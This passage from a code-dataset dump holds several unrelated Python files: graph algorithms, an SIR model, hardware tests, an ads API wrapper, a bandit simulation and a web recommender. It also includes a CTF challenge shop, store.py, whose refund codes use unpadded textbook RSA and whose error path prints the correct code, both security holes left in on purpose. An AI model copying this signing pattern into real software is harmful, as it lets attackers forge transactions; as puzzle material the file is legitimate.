APPROVED\")\n\n\n\n\n","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej3/hito1_ej3_d65634b492ff94d592e0c17a73bf4592.py","file_name":"hito1_ej3_d65634b492ff94d592e0c17a73bf4592.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"13775424719","text":"\"\"\"\nAuthors: Riley Campbell, Lane Moseley\nClass: CSC-372 Analysis of Algorithms, Fall 2020\nDescription: Strongly Connected Components for Social Networks\n\"\"\"\nfrom collections import deque\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n\nclass Vertex:\n    \"\"\"\n    Graph vertex.\n    \"\"\"\n\n    def __init__(self, value, neighbors=None):\n        \"\"\"\n        Initialize the vertex with a value and a set of neighbors.\n\n        Args:\n            value:\n            neighbors:\n        \"\"\"\n        # neighbors=[] is mutable, avoid that\n        if neighbors is None:\n            neighbors = []\n\n        self.index = -1\n        self.lowlink = -1\n        self.on_stack = False\n\n        self.neighbors = neighbors\n        self.value = value\n\n\ndef buildEdges(friends, G):\n    for key, values in friends.items():\n        for value in values:\n            G.add_edge(key, value)\n\n\ndef printSCC(dictionary, scc):\n    G = nx.DiGraph()\n    # filter out anything not in the scc\n    if len(scc) > 1:\n        for name in list(dictionary):\n            if name not in scc:\n                del dictionary[name]\n            else:\n                dictionary[name] = [x for x in dictionary[name] if x in scc]\n\n    
buildEdges(dictionary, G)\n    else:\n        G.add_node(scc[0])\n    # print graph\n    plt.figure()\n    nx.draw_networkx(G, with_labels=True, node_color='green')\n    plt.show()\n\n\nclass SocialNetwork:\n    \"\"\"\n    Social network graph. The graph is treated as directed, as required for SCCs.\n    \"\"\"\n\n    def __init__(self, dictionary):\n        \"\"\"\n        Initialize the graph with a set of vertices.\n\n        Args:\n            dictionary: { vertex: [neighbors] }\n        \"\"\"\n        self.__index = 0 # global index for SCC\n        self.__path = [] # list to track dfs path\n        self.__S = deque() # stack for SCC\n\n        # build a list of vertices and edges\n        self.__vertices = [Vertex(key, value) for key, value in dictionary.items()]\n        self.__edges = self.__edge_list()\n        self.__origDict = dictionary\n        self.__global_components = []\n\n    def __edge_list(self):\n        \"\"\"Build an edge list from a list of Vertices.\n\n        Returns:\n            edges: [(v, w)] where v, w are Vertex instances\n        \"\"\"\n        edges = []\n\n        for v in self.__vertices:\n            for w_value in v.neighbors:\n                # w is just a value, find the associated Vertex instance\n                w_vertex = next(vertex for vertex in self.__vertices if vertex.value == w_value)\n                edges.append((v, w_vertex))\n\n        return edges\n\n    def connected_components(self, show_plot=True):\n        # Pseudocode from\n        # https://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm#The_algorithm_in_pseudocode\n\n        self.__global_components = []\n\n        # input is self.__vertices\n        self.__S = deque() # create an empty stack\n        self.__index = 0 # index starts at zero\n        for v in self.__vertices:\n            if v.index == -1:\n                self.connected_components_helper(v, show_plot)\n\n        return self.__global_components\n\n    def connected_components_helper(self, vertex, show_plot=True):\n        # Pseudocode from\n        # https://en.wikipedia.org/wiki/Tarjan%27s_strongly_connected_components_algorithm#The_algorithm_in_pseudocode\n\n        vertex.index = self.__index\n        vertex.lowlink = self.__index\n        self.__index += 1\n        vertex.on_stack = True\n        self.__S.append(vertex)\n\n        for v, w in self.__edges:\n            if v is not vertex:\n                continue # Tarjan must only follow edges leaving the current vertex\n            if w.index == -1:\n                self.connected_components_helper(w, show_plot)\n                vertex.lowlink = min(vertex.lowlink, w.lowlink)\n            elif w.on_stack is True:\n                vertex.lowlink = min(vertex.lowlink, w.index)\n\n        if vertex.lowlink == vertex.index:\n            component = []\n\n            w = self.__S.pop()\n            w.on_stack = False\n            component.append(w.value)\n\n            while w != vertex:\n                w = self.__S.pop()\n                w.on_stack = False\n                component.append(w.value)\n\n            if show_plot is True:\n                # display result of SCC\n                printSCC(self.__origDict.copy(), component)\n\n            self.__global_components.append(component)\n\n    def dfs(self, value):\n        \"\"\"\n        Perform depth first search. This function is not used for the SCC, but\n        was added for reference and as build-up to the SCC functions.\n\n        Args:\n            value: starting node\n\n        Returns:\n            [ ]: depth first search traversal\n        \"\"\"\n\n        # check for empty list\n        if value is None:\n            return\n\n        # reset the path from any prior iteration\n        self.__path = []\n\n        # given some value, find the vertex with that value\n        vertex = next(v for v in self.__vertices if v.value == value)\n\n        # start the dfs\n        visited = []\n        self.dfs_helper(vertex, visited)\n\n        return self.__path\n\n    def dfs_helper(self, vertex, visited):\n        \"\"\"\n        Recursive helper function for depth first search. 
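# A quick cross-check of the Tarjan implementation above against networkx's
# own strongly_connected_components on a small directed graph:
import networkx as nx

G = nx.DiGraph([("a", "b"), ("b", "c"), ("c", "a"), ("c", "d")])
sccs = sorted(sorted(component) for component in nx.strongly_connected_components(G))
assert sccs == [["a", "b", "c"], ["d"]]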
This function is not\n        used for the SCC, but was added for reference and as build-up to the\n        SCC functions.\n\n        Args:\n            vertex: current node\n            visited: list of visited nodes\n\n        Returns:\n            None\n        \"\"\"\n        # add the vertex to the visited list\n        visited.append(vertex.value)\n\n        # add the vertex to the path\n        self.__path.append(vertex.value)\n\n        for neighbor in vertex.neighbors:\n            if neighbor not in visited:\n                # given some neighboring value, find the vertex with that value\n                next_vertex = next(v for v in self.__vertices if v.value == neighbor)\n\n                # recurse through the neighbor's neighbors\n                self.dfs_helper(next_vertex, visited)\n\n    def getHead(self):\n        if len(self.__vertices) > 0:\n            return self.__vertices[0].value\n        else:\n            return None\n","repo_name":"kbikeguy/mycodes","sub_path":"Python/social network/socialnetwork.py","file_name":"socialnetwork.py","file_ext":"py","file_size_in_byte":6015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"3538721179","text":"import numpy as np\nfrom scipy.integrate import odeint # For differential calculations\nimport matplotlib.pyplot as plt # For visualization\n\n# Coronavirus Spread Mathematical Model\n\n# In the SIR model we split the total population into three groups.\n# S = Susceptibles (People who could potentially catch the virus)\n# I = Infectives (People who currently have the virus and can infect others)\n# R = Recovered / Removed (People who already caught the virus, then either recovered or died, and cannot infect others)\n\n# Let's define the initial conditions\n\nN = 1000 # Total population\nmax_time = 15 # Simulation time\n\nSi = N * 0.99 # Normal people\nIi = N - Si # Infected people\nRi = 0\n\n# S + I + R should always be equal to N\n\ntransmission_rate = 4.2\nrecovery_rate = 0.9\nt = np.linspace(0, max_time - 1, max_time * 100) # x-axis\n\n# The SIR model differential equations\ndef model(z, t):\n    (S, I, R) = z\n    dsdt = -(transmission_rate * S * I) / N\n    didt = (transmission_rate * S * I) / N - (recovery_rate * I)\n    drdt = (recovery_rate * I)\n    return (dsdt, didt, drdt)\n\ninitial_vals = (Si, Ii, Ri) # initial values vector\n\nS, I, R = odeint(model, initial_vals, t).T\n\nfig = plt.figure(1)\nax1 = fig.add_subplot(211)\nax1.plot(t, S, 'b', label='Susceptibles')\nax1.plot(t, I, 'r', label='Infectives')\nax1.plot(t, R, 'g', label='Recovered')\nax1.set_xlabel('Time')\nax1.set_ylabel('Population')\nlegend = ax1.legend()\n\n###\n\ntransmission_rate = 2.2\nrecovery_rate = 0.9\n\n# The SIR model differential equations\n\ninitial_vals = (Si, Ii, Ri) # initial values vector\n\nS, I, R = odeint(model, initial_vals, t).T\n\nax2 = fig.add_subplot(212)\nax2.plot(t, S, 'b', label='Susceptibles')\nax2.plot(t, I, 'r', label='Infectives')\nax2.plot(t, R, 'g', label='Recovered')\nax2.set_xlabel('Time')\nax2.set_ylabel('Population')\nlegend = ax2.legend()\n\nplt.show()","repo_name":"enesdemirag/programming-exercises","sub_path":"exercises/materials/sir-model/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":1850,"program_lang":"python","lang":"en","doc_type":"code","stars":79,"dataset":"github-code","pt":"77"} +{"seq_id":"13748998165","text":"#!/usr/bin/python3\n\n# Prerequisites:\n# --------------\n\n# Installation of operating system tools\n# --------------------------------------\n# check available tty ports\n# sudo apt install usbutils\n# lsusb\n\n# Installation of python packages:\n# --------------------------------\n# sudo apt install python3-pip\n# pip3 install serial\n# pip3 install 
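# In the SIR demo above the outbreak grows only while the basic reproduction
# number R0 = transmission_rate / recovery_rate exceeds 1; both parameter sets
# used there (4.2/0.9 and 2.2/0.9) are supercritical.
def r0(transmission_rate, recovery_rate):
    return transmission_rate / recovery_rate

assert r0(4.2, 0.9) > 1
assert r0(2.2, 0.9) > 1
assert r0(0.5, 0.9) < 1  # below the threshold the infection dies out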
pyserial\n\nimport sys\nimport time\nimport serial\nimport argparse\n\nimport test_variables as tvars\n\n# terminal command line options\nparser = argparse.ArgumentParser(description=\"write data to test signal generator\")\nparser.add_argument(\"--presentation\", type=int, default=0, help=\"steps in presentation\")\nargs = parser.parse_args()\n\n# check which ttyUSBx port is available\n# tbd ...\n\n\n# configure port parameters\n# if an error occurs, check try /dev/ttyUSB1\nser = serial.Serial(\n port='/dev/ttyUSB0',\\\n baudrate=9600,\\\n parity='N',\\\n stopbits=1,\\\n bytesize=8,\\\n timeout=None)\n\n# print serial port configuration\nprint('Serial Port initialised with the following parameters:')\nprint('-----------------------------------------------------')\nprint(ser)\nprint('\\r')\n\n# define time between serial transfer in seconds\nwait_between_transfer = 0.5\n\nprint('Writing commands:')\nprint()\nprint(\"{:50s} | {}\".format(\"command\", \"(address | data) or pattern sequence hex\"))\nprint(100*\"-\")\n\nif args.presentation == 0: # default without optional argument\n commands = [\"system_control_enable\"]\n #commands = [\"system_control_disable\", \"noise_control_off\", \"pwm_control_off\", \"pattern_control_stop\"]\n #commands = [\"pwm_pulse_width_1\", \"pwm_period_max\",\"pwm_control_on_intern_trig\"]\n #commands = [\"pwm_pulse_width_1\", \"pwm_period_min\",\"pwm_control_on_intern_trig\"]\n #commands = [\"noise_period_max\",\"noise_prbsg_length_7bit\", \"noise_control_on_extern_trig\"]\n #commands = [\"pattern_length_4\", \"pattern_period_max\", \"pattern_control_load\", \"pattern_example_sequence_4\", \"pattern_extern_control_continous_run\"]\n\nelif args.presentation == 1:\n commands = [\"system_control_enable\"]\n\nelif args.presentation == 2:\n commands = [\"pwm_pulse_width_1\", \"pwm_period_max\",\"pwm_control_on_intern_trig\"]\n\nelif args.presentation == 3:\n commands = [\"pwm_pulse_width_255\"]\n\nelif args.presentation == 4:\n commands = [\"noise_period_max\",\"noise_prbsg_length_4bit\", \"noise_control_on_extern_trig\"]\n\nelif args.presentation == 5:\n commands = [\"noise_prbsg_length_7bit\"]\n\nelif args.presentation == 6:\n commands = [\"pattern_length_4\", \"pattern_period_max\", \"pattern_control_load\", \"pattern_example_sequence_4\", \"pattern_extern_control_continous_run\"]\n\n\nfor command in commands:\n print(\"{:50s} | {}\".format(command, tvars.serial_vars[command].hex())) \n ser.write(tvars.serial_vars[command])\n time.sleep(wait_between_transfer)\n\n# end with exit code\nsys.exit(0)\n\n","repo_name":"RuairiDillon1/VLSI-vhdlProject","sub_path":"scripts/write_to_ttyUSBx.py","file_name":"write_to_ttyUSBx.py","file_ext":"py","file_size_in_byte":2809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15257636356","text":"from ad_api.base import Client, sp_endpoint, ApiResponse, Utils\n\n\nclass NegativeKeywordsV3(Client):\n @sp_endpoint('/sp/negativeKeywords/list', method='POST')\n def list_negative_keywords(self, version: int = 3, **kwargs) -> ApiResponse:\n r\"\"\"\n Listing negative product keywords.\n\n Request Body (optional)\n\n Returns\n ApiResponse\n \"\"\"\n json_version = 'application/vnd.spNegativeKeyword.v' + str(version) + \"+json\"\n headers = {\"Accept\": json_version, \"Content-Type\": json_version}\n\n return self._request(kwargs.pop('path'), data=Utils.convert_body(kwargs.pop('body'), False), params=kwargs, headers=headers)\n\n @sp_endpoint('/sp/negativeKeywords', 
method='POST')\n    def create_negative_keyword(self, version: int = 3, prefer: bool = False, **kwargs) -> ApiResponse:\n        r\"\"\"\n        Creating negative product keywords.\n\n        Request Body (required)\n            | **nativeLanguageKeyword** : (*string*), The unlocalized keyword text in the preferred locale of the advertiser\n            | **nativeLanguageLocale** : (*string*), The locale preference of the advertiser.\n            | **campaignId**: *string*, The identifier of the campaign to which the keyword is associated.\n            | **adGroupId**: *string*, The identifier of the ad group to which this keyword is associated\n            | **state**: *string*, The current resource state.' , 'Enum': '[ enabled ]\n            | **keywordText**: *string*, The text of the expression to match against a search query.\n            | **matchType**: *string*, 'The type of match.' , 'Enum': '[ NEGATIVE_EXACT, NEGATIVE_PHRASE, NEGATIVE_BROAD ]\n\n        Returns\n            ApiResponse\n        \"\"\"\n        json_version = 'application/vnd.spNegativeKeyword.v' + str(version) + \"+json\"\n        headers = {\"Accept\": json_version, \"Content-Type\": json_version}\n\n        prefer_value = 'return=representation'\n        if prefer:\n            headers.update({\"Prefer\": prefer_value})\n\n        return self._request(kwargs.pop('path'), data=Utils.convert_body(kwargs.pop('body'), False), params=kwargs, headers=headers)\n\n    @sp_endpoint('/sp/negativeKeywords', method='PUT')\n    def edit_negative_keyword(self, version: int = 3, prefer: bool = False, **kwargs) -> ApiResponse:\n        r\"\"\"\n        Updating negative product keywords.\n\n        Request Body (required) :\n            | '**keywordId**': *string*, (required) {'description': 'The identifier of the keyword to update.'}\n            | '**state**': *string*, {'description': 'The current resource state.' , 'Enum': '[ enabled, paused, archived ]'}\n\n\n        Returns\n            ApiResponse\n        \"\"\"\n        json_version = 'application/vnd.spNegativeKeyword.v' + str(version) + \"+json\"\n        headers = {\"Accept\": json_version, \"Content-Type\": json_version}\n\n        prefer_value = 'return=representation'\n        if prefer:\n            headers.update({\"Prefer\": prefer_value})\n\n        return self._request(kwargs.pop('path'), data=Utils.convert_body(kwargs.pop('body'), False), params=kwargs, headers=headers)\n\n    @sp_endpoint('/sp/negativeKeywords/delete', method='POST')\n    def delete_negative_keywords(self, version: int = 3, **kwargs) -> ApiResponse:\n        r\"\"\"\n        Deleting negative product keywords.\n\n        Request Body (required)\n            | **keywordIdFilter** {} : Filter negative keywords by the list of objectIds\n                include [string] : list of negativeKeywordsIds as String to be used as filter. 
MinItems: 0, MaxItems: 1000\n\n        Returns\n            ApiResponse\n        \"\"\"\n\n        json_version = 'application/vnd.spNegativeKeyword.v' + str(version) + \"+json\"\n        headers = {\"Accept\": json_version, \"Content-Type\": json_version}\n\n        return self._request(kwargs.pop('path'), data=Utils.convert_body(kwargs.pop('body'), False), params=kwargs, headers=headers)\n","repo_name":"denisneuf/python-amazon-ad-api","sub_path":"ad_api/api/sp/negative_keywords_v3.py","file_name":"negative_keywords_v3.py","file_ext":"py","file_size_in_byte":3914,"program_lang":"python","lang":"en","doc_type":"code","stars":95,"dataset":"github-code","pt":"77"} +{"seq_id":"24457947342","text":"from pydantic import Field\nfrom typing import Optional, Union\nfrom ayaka import AyakaApp, AyakaInput, MessageSegment, msg_type\n\n\nclass UserInput(AyakaInput):\n    value: Optional[Union[msg_type.T_At, int, str]] = Field(\n        description=\"QQ number / name / @mention of the lookup target\")\n\n    def is_uid(self):\n        return isinstance(self.value, (MessageSegment, int))\n\n    def get_value(self):\n        if isinstance(self.value, MessageSegment):\n            return int(self.value.data[\"qq\"])\n        if isinstance(self.value, str) and self.value.startswith(\"@\"):\n            return self.value[1:]\n        return self.value\n\n\nasync def get_uid_name(app: AyakaApp, data: UserInput):\n    users = await app.bot.get_group_member_list(group_id=app.group_id)\n    value = data.get_value()\n\n    if data.is_uid():\n        for user in users:\n            uid = user[\"user_id\"]\n            if uid == value:\n                name = user[\"card\"] or user[\"nickname\"]\n                return uid, name\n        return 0, \"\"\n    else:\n        for user in users:\n            name = user[\"card\"] or user[\"nickname\"]\n            if name == value:\n                uid = user[\"user_id\"]\n                return uid, name\n        return 0, \"\"\n","repo_name":"bridgeL/nonebot-plugin-ayaka-who-is-suspect","sub_path":"ayaka_who_is_suspect/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7786702049","text":"import time\nimport RPi.GPIO as GPIO\n\npinLS_Buka = 22\npinLS_Tutup = 27\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(pinLS_Buka, GPIO.IN)\nGPIO.setup(pinLS_Tutup, GPIO.IN)\n\ncount = 0\ntry: \n\twhile True:\n\t\tbuka = GPIO.input(pinLS_Buka)\n\t\ttutup = GPIO.input(pinLS_Tutup)\n\n\t\tif buka == True:\n\t\t\tprint(\"Door open, \", count)\n\t\t\ttime.sleep(0.02)\n\n\t\telif tutup == True:\n\t\t\tprint(\"Door closed, \", count)\n\t\t\ttime.sleep(0.02)\n\n\t\telse:\n\t\t\tprint(\"Button not pressed, \", count)\n\t\t\ttime.sleep(0.02)\n\n\t\tcount += 1\n\nexcept KeyboardInterrupt:\n\tprint(\"Program Stop\")\n\nexcept:\n\tprint(\"Other Error or exception occurred!\")\n\nfinally:\n\tGPIO.cleanup()","repo_name":"ImamMuis/TugasAkhir","sub_path":"component_testing/testLimitSwitch.py","file_name":"testLimitSwitch.py","file_ext":"py","file_size_in_byte":622,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"17710348723","text":"import time\nfrom datetime import datetime\nimport re\nimport numpy as np\nimport pandas as pd\nimport string\n\n## Input\nwith open('input.txt') as f:\n    input = f.read()\n\nlines = input.strip().split('\\n')\n\n## Is this a reacting pair?\ndef isPair(a,b):\n\tif (a == b.lower() and b == a.upper()) or (b == a.lower() and a == b.upper()):\n\t\treturn True\n\telse:\n\t\treturn False\n\n#print(isPair('a','A'))\n#print(isPair('a','a'))\n\n#Input string and counters\nmyString = lines[0]\ni = 0\nb = len(myString)\n\n# React the string\nwhile i < b-1:\n\tif 
isPair(myString[i],myString[i+1]): #if pair\n\t\tmyString = myString[:i] + myString[(i+2):] #remove characters\n\t\ti = i - 1 #move index back to check\n\t\tb = b - 2 #adjust for new length of string\n\telse:\n\t\ti = i + 1 #else move forward\n\tif i < 0: #don't get stuck at index -1!\n\t\ti = 0\n\t#print(myString)\n\t# if i%100 == 0 or b%100 == 0:\n\t# \tprint(i,b)\nprint(len(myString)) #answer","repo_name":"srmwright/advent","sub_path":"2018/5/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9302729446","text":"from greedy_pick import GreedyPick\nimport random\n\nclass EpsilonGreedyPick():\n\tdef __init__(self, total_play_times, levers, greed, epsilon, premilinary_exploration) -> None:\n\t\tself.total_play_times = total_play_times\n\t\tself.levers = levers\n\t\tself.amount_of_levers = len(self.levers.get_levers())\n\t\tself.greed = greed\n\t\tself.epsilon = epsilon\n\t\tself.premilinary_exploration = premilinary_exploration\n\t\tself.average_return_per_lever = [0] * self.amount_of_levers\n\t\tself.amount_of_plays_per_lever = [0] * self.amount_of_levers\n\n\tdef _explore(self):\n\t\tgreedy_pick = GreedyPick(self.total_play_times, self.levers, self.greed)\n\t\treturn greedy_pick.explore()\n\n\tdef _pick_random_choice(self):\n\t\tchoice = random.randint(0, self.amount_of_levers-1)\n\t\tresult_of_choice = self.levers.pick_lever(choice)\n\t\tself.gain += result_of_choice\n\t\tself._calculate_new_average_and_amount(choice, result_of_choice)\n\n\tdef _pick_best_choice(self):\n\t\tbest_pick = self.average_return_per_lever.index(max(self.average_return_per_lever))\n\t\tresult_of_choice = self.levers.pick_lever(best_pick)\n\t\tself.gain += result_of_choice\n\t\tself._calculate_new_average_and_amount(best_pick, result_of_choice)\n\n\tdef play(self):\n\t\tself.gain = 0\n\t\tif self.premilinary_exploration:\n\t\t\tself.average_return_per_lever = self._explore()\n\t\t\tself.amount_of_plays_per_lever = [self.greed] * self.amount_of_levers\n\t\tfor _ in range(0, self.total_play_times):\n\t\t\trandom_chance = random.uniform(0, 1)\n\t\t\tif random_chance <= self.epsilon:\n\t\t\t\tself._pick_random_choice()\n\t\t\telse:\n\t\t\t\tself._pick_best_choice()\n\t\treturn (self.amount_of_plays_per_lever, self.gain)\n\n\tdef _calculate_new_average_and_amount(self, choice, result):\n\t\tnew_average = (self.average_return_per_lever[choice] * self.amount_of_plays_per_lever[choice] + result)/(self.amount_of_plays_per_lever[choice] + 1)\n\t\tself.average_return_per_lever[choice] = new_average\n\t\tself.amount_of_plays_per_lever[choice] += 1\n\n\t","repo_name":"dorinm17/connect_four_statistics","sub_path":"part3/epsilon_greedy_pick.py","file_name":"epsilon_greedy_pick.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"38126563642","text":"from typing import Union\nfrom typing import Set\n\n# pip install pycryptodome\nimport Crypto\nfrom Crypto.PublicKey import RSA\n\nSHOP_ITEMS = {\n \"USB Rubber Ducky\": 1,\n \"Malduino\": 2,\n \"WIFI Deauther\": 3,\n \"Bluetooth Jammer\": 5,\n \"GSM Jammer\": 7,\n \"Bad USB\": 10,\n \"CTF-Flag\": 1000,\n}\n\nFLAG = open(\"flag.txt\", \"r\").read()\n\n\ndef calc_refund_code(price: int, d: int, n: int):\n return pow(price, d, n)\n\n\nclass ShopTransaction:\n def __init__(\n self,\n name: str,\n price: int,\n priv_key: Crypto.PublicKey.RSA.RsaKey\n 
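# _calculate_new_average_and_amount() in epsilon_greedy_pick.py above is the
# standard streaming-mean update Q_{n+1} = (Q_n * n + r) / (n + 1), so no
# reward history needs to be stored. The same update in isolation:
def update_mean(mean, count, reward):
    return (mean * count + reward) / (count + 1), count + 1

mean, count = 0.0, 0
for r in [1.0, 0.0, 1.0, 1.0]:
    mean, count = update_mean(mean, count, r)
assert abs(mean - 0.75) < 1e-12 and count == 4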
):\n        self.name = name\n        self.price = price\n        self.refund_code = calc_refund_code(self.price, priv_key.d, priv_key.n)\n\n    def __str__(self):\n        return f\"{self.name}: {self.price}(Refund-Code: {self.refund_code})\"\n\n\nclass ShopState:\n    def __init__(\n        self,\n        name: str,\n        balance: int = 5,\n        priv_key: Crypto.PublicKey.RSA.RsaKey = None\n    ):\n        self.name = name\n        self.balance = balance\n        self.prev_refunds: Set[int] = set()\n        self.priv_key = priv_key\n        self.pub_key = self.priv_key.public_key()\n\n    def refund_item(self, price: int, refund_code: int) -> int:\n        if refund_code in self.prev_refunds:\n            return -1\n\n        reference_code = calc_refund_code(\n            price,\n            self.priv_key.d,\n            self.priv_key.n\n        )\n\n        if refund_code != reference_code:\n            print(type(refund_code))\n            print(type(reference_code))\n            print(\"Refund-Code\\n\", reference_code)\n            print(\"Calculated-Code\\n\", refund_code)\n            return -2\n\n        self.balance += price\n\n        return 0\n\n    def buy(self, name: str) -> Union[ShopTransaction, int]:\n        price = SHOP_ITEMS[name]\n\n        if self.balance < price:\n            return -1\n\n        self.balance -= price\n\n        if name == \"CTF-Flag\":\n            print(f\"Take this: {FLAG}\")\n\n        return ShopTransaction(name, price, self.priv_key)\n\n\ndef generate_keys() -> Crypto.PublicKey.RSA.RsaKey:\n    key = RSA.generate(1024)\n\n    return key\n\n\ndef buy_menu(shop_state: ShopState) -> int:\n\n    print(\"What item do you want to buy?\")\n\n    for i, item in enumerate(SHOP_ITEMS):\n        print(f\"{i}. {item}\")\n\n    print()\n    item_name = input(\"> \").strip()\n\n    if item_name not in SHOP_ITEMS.keys():\n        print(f\"Error! Item {item_name} could not be found\")\n        return -1\n\n    shop_transaction = shop_state.buy(item_name)\n\n    if isinstance(shop_transaction, int) and shop_transaction == -1:\n        print(\"Error, not enough money\")\n        return 0\n\n    print(f\"Bought {shop_transaction.name} for {shop_transaction.price}\")\n    print(f\"Refund-Code:\\n{shop_transaction.refund_code}\")\n    return 0\n\n\ndef refund_menu(shop_state: ShopState) -> int:\n    print(\"What do you want to refund?\")\n    print(\"Please provide the refund code\")\n    refund_code = input(\"> \").strip()\n    print(\"Please provide the price\")\n    refund_amount = input(\"> \").strip()\n\n    try:\n        refund_amount = int(refund_amount)\n    except ValueError:\n        print(f\"Value {refund_amount} not a valid price\")\n        return 0\n    try:\n        refund_code = int(refund_code)\n    except ValueError:\n        print(f\"Invalid {refund_code}\")\n        return 0\n\n    ret_val = shop_state.refund_item(refund_amount, refund_code)\n\n    if ret_val == 0:\n        print(\"Successfully refunded\")\n\n    if ret_val == -1:\n        print(\"Error, this refund code was already used!!\")\n\n    if ret_val == -2:\n        print(\"Error, this refund code does not match the price!\")\n\n    return 0\n\n\ndef display_menu():\n    key = generate_keys()\n\n    print(\"Welcome to the PWN-Store. Please authenticate:\")\n    user = input(\"Your Name: \")\n    print(f\"Welcome back {user}!\")\n\n    user_shop_state = ShopState(user, priv_key=key)\n\n    print(f\"Customernumber: {user_shop_state.pub_key.n}\")\n\n    while True:\n        print()\n        print(f\"Accountname: {user} (Balance: {user_shop_state.balance}€)\")\n        print(\"1. List Items\")\n        print(\"2. Buy Item\")\n        print(\"3. Refund Item\")\n        print(\"4. Exit\")\n        print()\n        action = input(\"> \")\n\n        try:\n            action = int(action.strip())\n        except ValueError:\n            print(f\"Error, {action} is not a valid number!\")\n            continue\n\n        if action < 1 or action > 4:\n            print(f\"Error, {action} is not a valid action\")\n\n        if action == 1:\n            for i, item in enumerate(SHOP_ITEMS):\n                print(f\"{i}. 
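# calc_refund_code() above is an unpadded ("textbook") RSA signature,
# pow(price, d, n), and such signatures are multiplicatively homomorphic:
# sig(a) * sig(b) mod n == sig(a * b mod n). The sketch below only
# demonstrates that property; whether it is the intended solution to this CTF
# challenge is not confirmed by the source.
from Crypto.PublicKey import RSA

key = RSA.generate(1024)
a, b = 3, 5
sig_a = pow(a, key.d, key.n)
sig_b = pow(b, key.d, key.n)
assert (sig_a * sig_b) % key.n == pow(a * b, key.d, key.n)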
{item} (Price: {SHOP_ITEMS[item]})\")\n\n        if action == 2:\n            ret_val = buy_menu(user_shop_state)\n            if ret_val != 0:\n                print(\"An Error occurred! Exiting\")\n                break\n\n        if action == 3:\n            refund_menu(user_shop_state)\n\n        if action == 4:\n            break\n\n    return 0\n\n\nif __name__ == \"__main__\":\n    raise SystemExit(display_menu())\n","repo_name":"sajjadium/ctf-archives","sub_path":"ctfs/Glacier/2022/crypto/CryptoShop/store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":4937,"program_lang":"python","lang":"en","doc_type":"code","stars":490,"dataset":"github-code","pt":"77"} +{"seq_id":"1692429034","text":"from functools import partial\nfrom os import name\nfrom pywebio import start_server\nfrom pywebio.input import NUMBER, input, TEXT, input_group,radio\nfrom pywebio.output import put_code, put_html, put_markdown, put_text, put_buttons,put_table, clear\nfrom bokeh.io import output_notebook,show\nfrom bokeh.io import show,output_file,output_notebook\nfrom bokeh.plotting import figure\nfrom pywebio.session import hold\nfrom correlacaoPearson import recommend, users,artists\n\nlist_of_users = []\navaliation_artists_media = []\nmy_avaliation = []\nuser_name = ''\n\ndef refactor():\n    for e in users:\n        user = e\n        avaliations = []\n        for key in artists: # check whether this artist is in the user's ratings\n            if(key not in users[e]):\n                #avaliations.append(users[e][key])\n                avaliations.append('-')\n            else:\n                avaliations.append(users[e][key])\n        list_of_users.append(list(user.split())+avaliations)\n        #print(list_of_users)\n\ndef mediaArtistas():\n    for artist in artists:\n        n = 0\n        soma = 0\n        for user in users:\n            if(artist in users[user]):\n                soma+=users[user][artist]\n                n+=1\n        avaliation_artists_media.append(soma/n)\n\n\n\ndef checkName(name):\n    if(name == ''):\n        return 'Please enter your name!'\n\ndef checkAvaliacaoNumero(value):\n    if(float(value) <0 or float(value) > 5):\n        return 'Invalid value!'\n\ndef btnclick(name,btn_val):\n    if(btn_val == 'yes'):\n        clear()\n        avaliar_artistas(name)\n    elif(btn_val == \"no\"):\n        exit(-1)\n\n\ndef refactor_my_avaliation(avaliacao):\n    list_of_valid_avaliations = []\n    for e,i in enumerate(avaliacao):\n        if(e>0 and not i == '-'):\n            list_of_valid_avaliations.append(float(i))\n\n    concat = list(zip(artists,list_of_valid_avaliations))\n    dic = dict(concat)\n    return (avaliacao[0],dic)\n\n\ndef avaliar_artistas(name):\n    array_avaliacao = []\n    array_avaliacao.append(name)\n    put_text('Starting a new rating')\n    for e in artists:\n        avaliacao = input('how do you rate %s'%e)\n        if(avaliacao == '' or float(avaliacao) < 0 or float(avaliacao)>5):\n            array_avaliacao.append('-')\n        else:\n            array_avaliacao.append(avaliacao)\n    put_text(\"Do you want to confirm these ratings?\")\n    put_table([artists]+[array_avaliacao[1:]])\n    put_buttons(['yes','no'],onclick=partial(avaliacao_btn, array_avaliacao))\n\n\ndef avaliacao_btn(avaliacao, btn_val):\n    if(btn_val == 'yes'):\n        clear()\n        list_of_users.append(avaliacao)\n        my_avaliation = refactor_my_avaliation(avaliacao)\n        put_table([['Users']+artists]+list_of_users)\n        plotar_grafico()\n        put_buttons(['view recommendations'], onclick=partial(mostrar_recomendacao, my_avaliation))\n    elif(btn_val == \"no\"):\n        exit(-1)\n\n\ndef put_on_pearson(avaliacao):\n    pass\n\ndef put_on_similaridade_cosseno(avaliacao):\n    pass\n\ndef mostrar_recomendacao(avaliacao,btn_val):\n    users[avaliacao[0]] = avaliacao[1]\n    recomendations =recommend(avaliacao[0],users)\n    #clear()\n    print(recomendations)\n    put_markdown('## %s, you might like these bands!'%avaliacao[0])\n    put_table([[x[0]] 
